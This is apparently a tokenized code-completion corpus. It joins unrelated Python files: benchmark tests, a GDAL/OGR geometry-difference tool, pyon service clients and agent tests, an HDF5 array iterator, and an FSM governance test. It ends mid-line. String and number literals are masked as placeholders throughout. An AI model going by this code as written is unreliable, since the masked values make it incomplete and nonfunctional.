<s> import time <EOL> from random import randint <EOL> from tests . utils . benchmark import Benchmark , BenchmarkData <EOL> class TestBenchmark ( Benchmark ) : <EOL> def setup ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> self . test = <NUM_LIT:0> <EOL> def test_nosetup ( self ) : <EOL> """<STR_LIT>""" <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' . format ( self . test ) ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> def setup_withsetup ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> self . test = <NUM_LIT:3> <EOL> def test_withsetup ( self ) : <EOL> """<STR_LIT>""" <EOL> print ( '<STR_LIT>' <EOL> . format ( self . test ) ) <EOL> test = BenchmarkData ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> test . add_result ( self . test ) <EOL> return test <EOL> def teardown_withsetup ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> self . test = <NUM_LIT> <EOL> def test_loop ( self ) : <EOL> """<STR_LIT>""" <EOL> test = BenchmarkData ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:30> ) : <EOL> test . add_result ( randint ( <NUM_LIT:0> , <NUM_LIT:1000> ) ) <EOL> return test <EOL> def test_zorglub ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' . format ( self . test ) ) <EOL> test = BenchmarkData ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> unit = '<STR_LIT>' <EOL> ) <EOL> test . add_result ( self . test ) <EOL> return test <EOL> def test_benchmark ( ) : <EOL> t = TestBenchmark ( '<STR_LIT>' , verbose = True ) <EOL> t . run ( ) <EOL> print ( '<STR_LIT>' . format ( '<STR_LIT>' ) ) <EOL> t . display ( ) <EOL> results = t . 
get_results ( ) <EOL> nosetup = results [ '<STR_LIT>' ] <EOL> withsetup = results [ '<STR_LIT>' ] <EOL> loop = results [ '<STR_LIT>' ] <EOL> zorglub = results [ '<STR_LIT>' ] <EOL> assert ( len ( nosetup [ '<STR_LIT>' ] ) == <NUM_LIT:1> ) <EOL> assert ( nosetup [ '<STR_LIT>' ] [ <NUM_LIT:0> ] >= <NUM_LIT> ) <EOL> assert ( nosetup [ '<STR_LIT>' ] is None ) <EOL> assert ( nosetup [ '<STR_LIT>' ] == '<STR_LIT>' ) <EOL> assert ( withsetup [ '<STR_LIT>' ] [ <NUM_LIT:0> ] == <NUM_LIT:3> ) <EOL> assert ( len ( loop [ '<STR_LIT>' ] ) == <NUM_LIT:30> ) <EOL> for r in loop [ '<STR_LIT>' ] : <EOL> assert ( r >= <NUM_LIT:0> and r <= <NUM_LIT:1000> ) <EOL> assert ( zorglub [ '<STR_LIT>' ] == '<STR_LIT>' ) <EOL> assert ( zorglub [ '<STR_LIT>' ] [ <NUM_LIT:0> ] == <NUM_LIT> ) <EOL> assert ( zorglub [ '<STR_LIT>' ] == '<STR_LIT>' ) </s>
<s> from . test_driver import start , plug <EOL> __all__ = [ "<STR_LIT:start>" , "<STR_LIT>" ] </s>
<s> import shutil <EOL> from osgeo import gdal <EOL> from osgeo import ogr <EOL> from ogrkit . cli import OGRKitUtility <EOL> from ogrkit . utils import get_bounding_box <EOL> gdal . UseExceptions ( ) <EOL> class OGRDifference ( OGRKitUtility ) : <EOL> description = '<STR_LIT>' <EOL> def add_arguments ( self ) : <EOL> self . argparser . add_argument ( '<STR_LIT>' , metavar = '<STR_LIT>' , nargs = '<STR_LIT:+>' , type = str ) <EOL> def main ( self ) : <EOL> source = ogr . Open ( self . args . input , False ) <EOL> source_layer = source . GetLayer ( <NUM_LIT:0> ) <EOL> try : <EOL> shutil . rmtree ( self . args . output ) <EOL> except OSError : <EOL> pass <EOL> driver = ogr . GetDriverByName ( '<STR_LIT>' ) <EOL> dest = driver . CreateDataSource ( self . args . output ) <EOL> dest_layer = dest . CreateLayer ( '<STR_LIT>' , geom_type = ogr . wkbMultiPolygon ) <EOL> for i in range ( source_layer . GetLayerDefn ( ) . GetFieldCount ( ) ) : <EOL> dest_layer . CreateField ( source_layer . GetLayerDefn ( ) . GetFieldDefn ( i ) ) <EOL> mask_features = [ ] <EOL> mask_boxes = [ ] <EOL> for mask in self . args . masks : <EOL> geo = ogr . Open ( mask , False ) <EOL> layer = geo . GetLayer ( <NUM_LIT:0> ) <EOL> for feature in layer : <EOL> mask_features . append ( feature ) <EOL> mask_boxes . append ( get_bounding_box ( feature . GetGeometryRef ( ) ) ) <EOL> for feature in source_layer : <EOL> masked_feature = ogr . Feature ( feature_def = source_layer . GetLayerDefn ( ) ) <EOL> masked_feature . SetFrom ( feature ) <EOL> masked_geometry = feature . GetGeometryRef ( ) . Clone ( ) <EOL> for ( i , mask_feature ) in enumerate ( mask_features ) : <EOL> bounding_box = mask_boxes [ i ] <EOL> if not masked_geometry . Intersects ( bounding_box ) : <EOL> continue <EOL> masked_geometry = masked_geometry . Difference ( mask_feature . GetGeometryRef ( ) ) <EOL> masked_feature . SetGeometryDirectly ( masked_geometry ) <EOL> dest_layer . CreateFeature ( masked_feature ) </s>
<s> __author__ = '<STR_LIT>' <EOL> from pyon . public import Container , ImmediateProcess <EOL> from pyon . util . context import LocalContextMixin <EOL> from pyon . core . governance import get_actor_header <EOL> from interface . services . examples . hello . ihello_service import HelloServiceProcessClient <EOL> from interface . services . icontainer_agent import ContainerAgentProcessClient <EOL> class FakeProcess ( LocalContextMixin ) : <EOL> name = '<STR_LIT>' <EOL> id = '<STR_LIT>' <EOL> class HelloClientProcess ( ImmediateProcess ) : <EOL> """<STR_LIT>""" <EOL> def on_init ( self ) : <EOL> pass <EOL> def on_start ( self ) : <EOL> text = self . CFG . get ( "<STR_LIT:text>" , '<STR_LIT>' ) <EOL> actor_id = self . CFG . get ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> container_name = self . CFG . get ( "<STR_LIT>" , None ) <EOL> hello_client ( self . container , actor_id , text ) <EOL> if container_name : <EOL> cc_client = ContainerAgentProcessClient ( node = self . container . node , process = self , name = container_name ) <EOL> cc_client . stop ( ) <EOL> def on_quit ( self ) : <EOL> pass <EOL> def hello_client ( container , actor_id = '<STR_LIT>' , text = '<STR_LIT>' ) : <EOL> try : <EOL> client = HelloServiceProcessClient ( node = container . node , process = FakeProcess ( ) ) <EOL> actor_headers = get_actor_header ( actor_id ) <EOL> ret = client . hello ( text , headers = actor_headers ) <EOL> print "<STR_LIT>" + str ( ret ) <EOL> ret = client . hello ( '<STR_LIT>' , headers = actor_headers ) <EOL> print "<STR_LIT>" + str ( ret ) <EOL> ret = client . noop ( text = '<STR_LIT>' , headers = actor_headers ) <EOL> print "<STR_LIT>" <EOL> except Exception , e : <EOL> print "<STR_LIT>" + e . message <EOL> def hello_noop ( container , actor_id = '<STR_LIT>' , text = '<STR_LIT>' ) : <EOL> try : <EOL> client = HelloServiceProcessClient ( node = container . node , process = FakeProcess ( ) ) <EOL> actor_headers = get_actor_header ( actor_id ) <EOL> ret = client . 
noop ( text , headers = actor_headers ) <EOL> except Exception , e : <EOL> print "<STR_LIT>" + e . message <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> container = Container ( ) <EOL> container . start ( ) <EOL> hello_client ( container , actor_id = '<STR_LIT>' ) <EOL> container . stop ( ) </s>
<s> '''<STR_LIT>''' <EOL> from operator import mul <EOL> from pyon . core . exception import NotFound , BadRequest <EOL> from pyon . public import log <EOL> import itertools <EOL> def acquire_data ( hdf_files = None , var_names = None , concatenate_size = None , bounds = None ) : <EOL> import h5py , numpy <EOL> if hdf_files is None : <EOL> raise NotFound ( '<STR_LIT>' ) <EOL> if var_names is None : <EOL> raise NotFound ( '<STR_LIT>' ) <EOL> if concatenate_size is None : <EOL> raise NotFound ( '<STR_LIT>' ) <EOL> open_files = [ ] <EOL> try : <EOL> for hdf_file in hdf_files : <EOL> try : <EOL> file = h5py . File ( hdf_file , '<STR_LIT:r>' ) <EOL> except IOError as ioe : <EOL> log . exception ( '<STR_LIT>' , hdf_file ) <EOL> try : <EOL> file = h5py . File ( hdf_file , '<STR_LIT:r>' ) <EOL> except : <EOL> log . exception ( '<STR_LIT>' , hdf_file ) <EOL> if len ( hdf_files ) == <NUM_LIT:1> : <EOL> raise ioe <EOL> open_files . append ( file ) <EOL> gen = _acquire_hdf_data ( open_hdf_files = open_files , var_names = var_names , concatenate_size = concatenate_size , bounds = bounds ) <EOL> for item in gen : <EOL> yield item <EOL> finally : <EOL> for file in open_files : <EOL> file . close ( ) <EOL> def _acquire_hdf_data ( open_hdf_files = None , var_names = None , concatenate_size = None , bounds = None ) : <EOL> import h5py , numpy <EOL> out_dict = { } <EOL> def check_for_dataset ( nodes , var_names ) : <EOL> """<STR_LIT>""" <EOL> import h5py <EOL> for node in nodes : <EOL> if isinstance ( node , h5py . _hl . dataset . Dataset ) : <EOL> dataset_name = node . name . rsplit ( '<STR_LIT:/>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> dataset = node <EOL> if dataset_name in var_names : <EOL> dict_of_h5py_datasets [ dataset_name ] = dataset <EOL> elif isinstance ( node , h5py . _hl . group . Group ) : <EOL> check_for_dataset ( node . 
values ( ) , var_names ) <EOL> dataset_lists_by_name = { } <EOL> for file in open_hdf_files : <EOL> dict_of_h5py_datasets = { } <EOL> chopped_end = { } <EOL> log . debug ( '<STR_LIT>' % file ) <EOL> nodes = file . values ( ) <EOL> check_for_dataset ( nodes , var_names ) <EOL> log . debug ( '<STR_LIT>' % dict_of_h5py_datasets ) <EOL> if not dict_of_h5py_datasets : <EOL> continue <EOL> for vname in var_names : <EOL> dataset = dict_of_h5py_datasets . get ( vname , None ) <EOL> if dataset : <EOL> dset_list = dataset_lists_by_name . get ( vname , [ ] ) <EOL> dset_list . append ( dataset ) <EOL> dataset_lists_by_name [ vname ] = dset_list <EOL> array_iterators_by_name = { } <EOL> if len ( dataset_lists_by_name . keys ( ) ) == <NUM_LIT:0> : <EOL> raise NotFound ( '<STR_LIT>' ) <EOL> for vname , dset_list in dataset_lists_by_name . iteritems ( ) : <EOL> virtual_dset = VirtualDataset ( dset_list ) <EOL> if bounds : <EOL> check_bounds ( bounds , virtual_dset ) <EOL> iarray = ArrayIterator ( virtual_dset , concatenate_size ) [ bounds ] <EOL> else : <EOL> iarray = ArrayIterator ( virtual_dset , concatenate_size ) <EOL> array_iterators_by_name [ vname ] = iarray <EOL> log . warn ( array_iterators_by_name ) <EOL> names = array_iterators_by_name . keys ( ) <EOL> iarrays = array_iterators_by_name . values ( ) <EOL> log . warn ( '<STR_LIT>' % len ( iarrays ) ) <EOL> for ichunks in itertools . izip_longest ( * iarrays ) : <EOL> log . warn ( '<STR_LIT>' % len ( ichunks ) ) <EOL> for name , chunk , iarray in itertools . izip ( names , ichunks , iarrays ) : <EOL> out_dict [ name ] = { '<STR_LIT>' : iarray . curr_slice , <EOL> '<STR_LIT>' : ( numpy . nanmin ( chunk ) , numpy . 
nanmax ( chunk ) ) , <EOL> '<STR_LIT>' : chunk } <EOL> yield out_dict <EOL> def check_bounds ( bounds , virtual_dset ) : <EOL> """<STR_LIT>""" <EOL> if type ( bounds ) != tuple and type ( bounds ) != slice : <EOL> raise BadRequest ( '<STR_LIT>' ) <EOL> if type ( bounds ) == tuple and len ( bounds ) > len ( virtual_dset . shape ) : <EOL> raise BadRequest ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class VirtualDataset ( object ) : <EOL> def __init__ ( self , var_list ) : <EOL> import h5py , numpy <EOL> self . _vars = [ ] <EOL> self . _records = <NUM_LIT:0> <EOL> self . _starts = [ ] <EOL> self . _stops = [ ] <EOL> agg_shape = None <EOL> for var in var_list : <EOL> vv = { } <EOL> vv [ '<STR_LIT:data>' ] = var <EOL> shape = var . shape <EOL> vv [ '<STR_LIT>' ] = shape <EOL> agg_shape = agg_shape or shape [ <NUM_LIT:1> : ] <EOL> assert agg_shape == shape [ <NUM_LIT:1> : ] <EOL> vv [ '<STR_LIT>' ] = shape [ <NUM_LIT:0> ] <EOL> self . _starts . append ( self . _records ) <EOL> self . _records += shape [ <NUM_LIT:0> ] <EOL> self . _stops . append ( self . _records - <NUM_LIT:1> ) <EOL> self . _vars . append ( vv ) <EOL> self . _agg_shape = agg_shape <EOL> self . _shape = ( self . _records , ) + self . _agg_shape <EOL> def __getitem__ ( self , index ) : <EOL> import h5py , numpy <EOL> assert len ( index ) == len ( self . shape ) <EOL> get_start = index [ <NUM_LIT:0> ] . start <EOL> get_stop = index [ <NUM_LIT:0> ] . stop <EOL> assert get_stop > get_start <EOL> agg_slices = index [ <NUM_LIT:1> : ] <EOL> for start , stop , var in zip ( self . _starts , self . _stops , self . 
_vars ) : <EOL> if stop < get_start : <EOL> continue <EOL> if start > get_stop : <EOL> continue <EOL> elif start <= get_start and stop >= get_start : <EOL> slc = slice ( get_start - start , get_stop - start ) <EOL> aggregate = var [ '<STR_LIT:data>' ] [ ( slc , ) + agg_slices ] <EOL> elif start > get_start and start < get_stop : <EOL> slc = slice ( <NUM_LIT:0> , get_stop - start ) <EOL> new = var [ '<STR_LIT:data>' ] [ ( slc , ) + agg_slices ] <EOL> aggregate = numpy . concatenate ( ( aggregate , new ) ) <EOL> return aggregate <EOL> @ property <EOL> def __array_interface__ ( self ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> @ property <EOL> def shape ( self ) : <EOL> return self . _shape <EOL> @ property <EOL> def size ( self ) : <EOL> res = <NUM_LIT:1> <EOL> for dim in self . shape : <EOL> res *= dim <EOL> return res <EOL> def __iter__ ( self ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> class ArrayIterator ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , var , buf_size = None ) : <EOL> self . var = var <EOL> self . buf_size = buf_size <EOL> self . start = [ <NUM_LIT:0> for dim in var . shape ] <EOL> self . stop = [ dim for dim in var . shape ] <EOL> self . step = [ <NUM_LIT:1> for dim in var . shape ] <EOL> self . curr_slice = '<STR_LIT>' <EOL> def __getitem__ ( self , index ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( index , tuple ) : index = ( index , ) <EOL> fixed = [ ] <EOL> length , dims = len ( index ) , len ( self . shape ) <EOL> for slice_ in index : <EOL> if slice_ is Ellipsis : <EOL> fixed . extend ( [ slice ( None ) ] * ( dims - length + <NUM_LIT:1> ) ) <EOL> length = len ( fixed ) <EOL> elif isinstance ( slice_ , ( int , long ) ) : <EOL> fixed . append ( slice ( slice_ , slice_ + <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> else : <EOL> fixed . append ( slice_ ) <EOL> index = tuple ( fixed ) <EOL> if len ( index ) < dims : <EOL> index += ( slice ( None ) , ) * ( dims - len ( index ) ) <EOL> out = self . __class__ ( self . 
var , self . buf_size ) <EOL> for i , ( start , stop , step , slice_ ) in enumerate ( <EOL> zip ( self . start , self . stop , self . step , index ) ) : <EOL> log . debug ( '<STR_LIT>' % type ( out ) ) <EOL> log . debug ( '<STR_LIT>' % str ( slice_ ) ) <EOL> out . start [ i ] = start + ( slice_ . start or <NUM_LIT:0> ) <EOL> out . step [ i ] = step * ( slice_ . step or <NUM_LIT:1> ) <EOL> out . stop [ i ] = start + ( slice_ . stop or stop - start ) <EOL> out . stop [ i ] = min ( stop , out . stop [ i ] ) <EOL> return out <EOL> @ property <EOL> def __array_interface__ ( self ) : <EOL> slice_ = tuple ( slice ( * t ) for t in zip ( <EOL> self . start , self . stop , self . step ) ) <EOL> data = self . var [ slice_ ] . copy ( ) <EOL> return { <EOL> '<STR_LIT:version>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : self . shape , <EOL> '<STR_LIT>' : data . dtype . str , <EOL> '<STR_LIT:data>' : data , <EOL> } <EOL> @ property <EOL> def flat ( self ) : <EOL> for block in self : <EOL> for value in block . flat : <EOL> yield value <EOL> @ property <EOL> def shape ( self ) : <EOL> return tuple ( max ( <NUM_LIT:0> , ( ( stop - start - <NUM_LIT:1> ) // step + <NUM_LIT:1> ) ) <EOL> for start , stop , step in <EOL> zip ( self . start , self . stop , self . step ) ) <EOL> def __iter__ ( self ) : <EOL> if [ dim for dim in self . shape if dim <= <NUM_LIT:0> ] : <EOL> log . warn ( "<STR_LIT>" ) <EOL> raise StopIteration <EOL> start = self . start [ : ] <EOL> stop = self . stop [ : ] <EOL> step = self . step [ : ] <EOL> ndims = len ( self . var . shape ) <EOL> while <NUM_LIT:1> : <EOL> count = self . buf_size or reduce ( mul , self . shape ) <EOL> rundim = <NUM_LIT:0> <EOL> for i in range ( ndims - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> if count == <NUM_LIT:0> : <EOL> stop [ i ] = start [ i ] + <NUM_LIT:1> <EOL> elif count <= self . shape [ i ] : <EOL> stop [ i ] = start [ i ] + count * step [ i ] <EOL> rundim = i <EOL> else : <EOL> stop [ i ] = self . 
stop [ i ] <EOL> stop [ i ] = min ( self . stop [ i ] , stop [ i ] ) <EOL> count = count // self . shape [ i ] <EOL> slice_ = tuple ( slice ( * t ) for t in zip ( start , stop , step ) ) <EOL> self . curr_slice = slice_ <EOL> yield self . var [ slice_ ] <EOL> if ndims == <NUM_LIT:0> : <EOL> log . warn ( "<STR_LIT>" ) <EOL> raise StopIteration <EOL> start [ rundim ] = stop [ rundim ] <EOL> for i in range ( ndims - <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ) : <EOL> if start [ i ] >= self . stop [ i ] : <EOL> start [ i ] = self . start [ i ] <EOL> start [ i - <NUM_LIT:1> ] += self . step [ i - <NUM_LIT:1> ] <EOL> if start [ <NUM_LIT:0> ] >= self . stop [ <NUM_LIT:0> ] : <EOL> log . warn ( "<STR_LIT>" ) <EOL> raise StopIteration </s>
<s> __author__ = '<STR_LIT>' <EOL> from unittest import SkipTest <EOL> from nose . plugins . attrib import attr <EOL> from pyon . agent . simple_agent import SimpleResourceAgent <EOL> from pyon . agent . agent import ResourceAgentClient <EOL> from pyon . public import IonObject <EOL> from pyon . util . int_test import IonIntegrationTestCase <EOL> class SampleAgent ( SimpleResourceAgent ) : <EOL> dependencies = [ ] <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestResourceAgentClient ( IonIntegrationTestCase ) : <EOL> def test_agent_registration ( self ) : <EOL> self . _start_container ( ) <EOL> idev = IonObject ( "<STR_LIT>" , name = "<STR_LIT>" ) <EOL> idev_id , _ = self . container . resource_registry . create ( idev ) <EOL> config = dict ( agent = dict ( resource_id = idev_id ) ) <EOL> pid1 = self . container . spawn_process ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , config ) <EOL> rac = ResourceAgentClient ( idev_id ) <EOL> rac_pid = rac . get_agent_process_id ( ) <EOL> rac_de = rac . get_agent_directory_entry ( ) <EOL> self . assertEquals ( rac_pid , pid1 ) <EOL> self . container . directory . register ( "<STR_LIT>" , "<STR_LIT>" , <EOL> ** dict ( name = "<STR_LIT>" , <EOL> container = self . container . id , <EOL> resource_id = idev_id , <EOL> agent_id = "<STR_LIT>" ) ) <EOL> entries = self . container . directory . find_by_value ( '<STR_LIT>' , '<STR_LIT>' , idev_id ) <EOL> self . assertEquals ( len ( entries ) , <NUM_LIT:2> ) <EOL> rac = ResourceAgentClient ( idev_id ) <EOL> rac_pid1 = rac . get_agent_process_id ( ) <EOL> self . assertEquals ( rac_pid1 , "<STR_LIT>" ) <EOL> entries = self . container . directory . find_by_value ( '<STR_LIT>' , '<STR_LIT>' , idev_id ) <EOL> self . assertEquals ( len ( entries ) , <NUM_LIT:1> ) <EOL> self . container . directory . register ( "<STR_LIT>" , pid1 , <EOL> ** dict ( name = "<STR_LIT>" , <EOL> container = self . container . id , <EOL> resource_id = idev_id , <EOL> agent_id = rac_de . 
attributes [ "<STR_LIT>" ] ) ) <EOL> rac = ResourceAgentClient ( idev_id ) <EOL> rac_pid1 = rac . get_agent_process_id ( ) <EOL> self . assertEquals ( rac_pid1 , pid1 ) <EOL> entries = self . container . directory . find_by_value ( '<STR_LIT>' , '<STR_LIT>' , idev_id ) <EOL> self . assertEquals ( len ( entries ) , <NUM_LIT:1> ) <EOL> self . container . terminate_process ( pid1 ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import os , inspect <EOL> from pyon . core . governance . conversation . core . transition import TransitionFactory <EOL> from pyon . core . governance . conversation . core . local_type import LocalType <EOL> from pyon . core . governance . conversation . core . fsm import ExceptionFSM , ExceptionFailAssertion <EOL> from pyon . core . governance . conversation . parsing . base_parser import ANTLRScribbleParser <EOL> from pyon . util . int_test import IonIntegrationTestCase <EOL> from pyon . util . log import log <EOL> from nose . plugins . attrib import attr <EOL> def purchasingAtBuyer_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def locateChoiceAtBuyer_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT:OK>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def recAtBuyer_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . 
create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def recAndChoice_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def parallelAtSeller1_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT:OK>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def Interrupt_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def main_auction_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . 
RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT:OK>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def logic_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> return events <EOL> def recAsRepeat_events ( ) : <EOL> events = [ ] <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT:OK>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . RESV , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> events . append ( TransitionFactory . create ( LocalType . SEND , '<STR_LIT:OK>' , '<STR_LIT>' ) ) <EOL> return events <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestFSM ( IonIntegrationTestCase ) : <EOL> def setUp ( self ) : <EOL> cur_dir = os . path . dirname ( os . path . abspath ( inspect . getfile ( inspect . currentframe ( ) ) ) ) <EOL> self . path = '<STR_LIT>' % cur_dir <EOL> def base ( self , lt_filename , events ) : <EOL> try : <EOL> myparser = ANTLRScribbleParser ( ) <EOL> res = myparser . parse ( self . path + lt_filename ) <EOL> builder = myparser . walk ( res ) <EOL> log . debug ( builder . memory ) <EOL> log . debug ( builder . main_fsm . fsm . memory ) <EOL> log . debug ( builder . main_fsm . recursions_states ) <EOL> log . debug ( builder . current_fsm . fsm . state_transitions ) <EOL> builder . main_fsm . fsm . 
process_list ( events ) <EOL> except ExceptionFSM : raise <EOL> def base_logic ( self , lt_filename , events , payloads ) : <EOL> try : <EOL> myparser = ANTLRScribbleParser ( ) <EOL> res = myparser . parse ( self . path + lt_filename ) <EOL> builder = myparser . walk ( res ) <EOL> log . debug ( builder . current_fsm . fsm . state_transitions ) <EOL> builder . main_fsm . fsm . set_assertion_check_on ( ) <EOL> builder . main_fsm . fsm . process_list ( events , payloads ) <EOL> log . debug ( builder . main_fsm . fsm . interrupt_transition ) <EOL> log . debug ( builder . main_fsm . fsm . interrupt_start_state ) <EOL> except ExceptionFSM : <EOL> raise <EOL> def test_rec_as_repeat ( self ) : <EOL> self . base ( '<STR_LIT>' , recAsRepeat_events ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_simpleInteraction ( self ) : <EOL> self . base ( '<STR_LIT>' , purchasingAtBuyer_events ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_choice ( self ) : <EOL> self . base ( '<STR_LIT>' , locateChoiceAtBuyer_events ( ) [ <NUM_LIT:0> : <NUM_LIT:2> ] ) <EOL> self . base ( '<STR_LIT>' , locateChoiceAtBuyer_events ( ) [ <NUM_LIT:2> : <NUM_LIT:6> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_choice_wrong ( self ) : <EOL> self . base ( '<STR_LIT>' , locateChoiceAtBuyer_events ( ) [ <NUM_LIT:0> : <NUM_LIT:2> ] ) <EOL> self . assertRaises ( ExceptionFSM , self . base , '<STR_LIT>' , locateChoiceAtBuyer_events ( ) [ <NUM_LIT:1> : <NUM_LIT:4> ] ) <EOL> def test_parallel ( self ) : <EOL> self . base ( '<STR_LIT>' , parallelAtSeller1_events ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_parallel_wrong ( self ) : <EOL> self . assertRaises ( ExceptionFSM , self . base , '<STR_LIT>' , recAtBuyer_events ( ) [ <NUM_LIT:1> : ] ) <EOL> def test_logic ( self ) : <EOL> payloads = [ [ <NUM_LIT:1> ] , [ "<STR_LIT:a>" ] , [ <NUM_LIT:5> ] , [ <NUM_LIT:4> ] ] <EOL> self . 
base_logic ( '<STR_LIT>' , logic_events ( ) , payloads ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_logic_fail ( self ) : <EOL> payloads = [ [ <NUM_LIT:1> ] , [ "<STR_LIT>" ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:4> ] ] <EOL> self . assertRaises ( ExceptionFailAssertion , self . base_logic , '<STR_LIT>' , logic_events ( ) , payloads ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_interrupt ( self ) : <EOL> self . base ( '<STR_LIT>' , Interrupt_events ( ) [ <NUM_LIT:0> : <NUM_LIT:3> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_interrupt_execute_do_and_interrupt ( self ) : <EOL> self . assertRaises ( ExceptionFSM , self . base , '<STR_LIT>' , Interrupt_events ( ) [ <NUM_LIT:0> : <NUM_LIT:6> ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def test_interrupt_when_interrupt_occur ( self ) : <EOL> self . base ( '<STR_LIT>' , ( Interrupt_events ( 